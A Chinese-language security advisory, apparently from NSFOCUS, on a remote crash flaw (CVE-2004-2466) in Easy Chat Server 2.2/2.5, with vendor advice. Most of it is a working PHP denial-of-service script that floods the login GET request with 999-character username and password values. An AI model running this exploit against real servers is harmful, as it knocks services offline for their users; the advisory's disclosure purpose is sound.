安全研究

安全漏洞
EFS Software Easy Chat Server身份验证请求处理远程缓冲区溢出漏洞

发布日期:2007-08-14
更新日期:2011-08-15

受影响系统:
EFS Software Easy Chat Server 2.5
EFS Software Easy Chat Server 2.2
描述:
BUGTRAQ  ID: 25328
CVE(CAN) ID: CVE-2004-2466

Easy Chat Server是一款基于WEB的聊天服务程序。

Easy Chat Server在处理带有长用户名的GET请求时存在远程拒绝服务漏洞,可导致拒绝访问。

<*来源:NetJackal (nima_501@yahoo.com
  
  链接:http://osvdb.org/show/osvdb/7416
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

NetJackal (nima_501@yahoo.com)提供了如下测试方法:

<?php

##########################################################
###----------------------------------------------------###
###--------Easy Chat Server Remote DoS Exploit---------###
###----------------------------------------------------###
###-http://www.echatserver.com/------------------------###
###----------------------------------------------------###
###-Tested on version 2.2 [last version]-(XP SP2)------###
###----------------------------------------------------###
###-Usage:-php dos.php [TARGET] [PORT]-----------------###
###----------------------------------------------------###
###-Author:--NetJackal---------------------------------###
###-Email:---nima_501[at]yahoo[dot]com-----------------###
###-Website:-http://netjackal.by.ru--------------------###
###----------------------------------------------------###
##########################################################

/*
Description:
Easy Chat Server has built-in web server let users
login to chat server. Login page allow Max 30 characters
length for Name & Password. If attacker inserts a long Name &
Password by editing or make his own login page, chat server
will crash.
*/
echo "Easy Chat Server Remote DoS Exploit\n\t\t\t\tby NetJackal";
if($argc<2)die("\nUsage:   php dos.php [TARGET] [PORT]\nExample: php dos.php localhost 80\n");
$host=$argv[1];
$port=$argv[2];
$A=str_repeat('A',999);
echo "\nConnecting...";
$link=fsockopen($host,$port,$en,$es,30);
if(!$link)die("\n$en: $es");
echo "\nConnected!";
echo "\nSending exploit...";
fputs($link,"GET /chat.ghp?username=$A&password=$A&room=1&sex=2 HTTP/1.1\r\nHost: $host\r\n\r\n");
echo "\nWell done!\n";
?>

建议:
厂商补丁:

EFS Software
------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.echatserver.com/index.htm

浏览次数:1628
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障